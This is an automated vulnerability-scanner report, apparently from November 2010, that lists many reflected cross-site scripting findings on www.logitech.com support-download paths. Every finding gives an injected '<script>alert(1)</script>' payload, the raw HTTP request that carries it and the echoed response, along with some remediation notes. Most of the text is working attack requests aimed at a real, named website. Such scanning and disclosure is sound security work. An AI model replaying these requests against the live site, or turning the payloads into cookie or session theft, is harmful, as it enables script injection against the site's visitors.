The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c4f6</script><script>alert(1)</script>ffd779dc174 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5c4f6</script><script>alert(1)</script>ffd779dc174/support-downloads/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf95"><script>alert(1)</script>92f3a149b15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/support-downloadsdcf95"><script>alert(1)</script>92f3a149b15/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:56:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777e1</script><script>alert(1)</script>22167cb86d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads777e1</script><script>alert(1)</script>22167cb86d5/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:57:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d39ed</script><script>alert(1)</script>6dbeccc549a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /d39ed</script><script>alert(1)</script>6dbeccc549a/support-downloads/downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ab6"><script>alert(1)</script>8f026895966 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usf3ab6"><script>alert(1)</script>8f026895966/support-downloads/downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd098"><script>alert(1)</script>bc58e3f5735 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloadscd098"><script>alert(1)</script>bc58e3f5735/downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a44</script><script>alert(1)</script>b72c9e81688 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads77a44</script><script>alert(1)</script>b72c9e81688/downloads HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dbd"><script>alert(1)</script>fbe96a02ed8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloadsd0dbd"><script>alert(1)</script>fbe96a02ed8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2414</script><script>alert(1)</script>cc6fa7106a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloadsf2414</script><script>alert(1)</script>cc6fa7106a2 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5aa17</script><script>alert(1)</script>3dbc52c40cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /5aa17</script><script>alert(1)</script>3dbc52c40cd/support-downloads/downloads/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d68"><script>alert(1)</script>48982e689b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us69d68"><script>alert(1)</script>48982e689b2/support-downloads/downloads/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb440"><script>alert(1)</script>503a3c1f9e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloadsfb440"><script>alert(1)</script>503a3c1f9e1/downloads/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20bdf</script><script>alert(1)</script>a2ee19fcdc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads20bdf</script><script>alert(1)</script>a2ee19fcdc2/downloads/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6d27</script><script>alert(1)</script>b62757d64c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloadsf6d27</script><script>alert(1)</script>b62757d64c1/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94bb4"><script>alert(1)</script>71c8f3b5a4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloads94bb4"><script>alert(1)</script>71c8f3b5a4c/game-gear HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a954</script><script>alert(1)</script>04541d6c2e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloads/game-gear9a954</script><script>alert(1)</script>04541d6c2e0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3e3c"><script>alert(1)</script>aa90d5f63a0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloads/game-geara3e3c"><script>alert(1)</script>aa90d5f63a0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8025</script><script>alert(1)</script>dc62e216b7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /b8025</script><script>alert(1)</script>dc62e216b7c/support-downloads/downloads/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4740"><script>alert(1)</script>1b9bda45eba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usa4740"><script>alert(1)</script>1b9bda45eba/support-downloads/downloads/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae7c</script><script>alert(1)</script>57e2bdb97e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloadseae7c</script><script>alert(1)</script>57e2bdb97e7/downloads/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190cc"><script>alert(1)</script>8f261c43211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads190cc"><script>alert(1)</script>8f261c43211/downloads/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7b99</script><script>alert(1)</script>c6d57e5769d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloadsf7b99</script><script>alert(1)</script>c6d57e5769d/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc39c"><script>alert(1)</script>682ba778b22 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloadsdc39c"><script>alert(1)</script>682ba778b22/microphones HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:40:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a0bb"><script>alert(1)</script>0b833ff3c36 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloads/microphones4a0bb"><script>alert(1)</script>0b833ff3c36 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2af3</script><script>alert(1)</script>709fee99457 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloads/microphonesf2af3</script><script>alert(1)</script>709fee99457 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f73d3</script><script>alert(1)</script>9dc6ab39035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f73d3</script><script>alert(1)</script>9dc6ab39035/support-downloads/downloads/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43658"><script>alert(1)</script>ddb56d5bd0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us43658"><script>alert(1)</script>ddb56d5bd0b/support-downloads/downloads/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
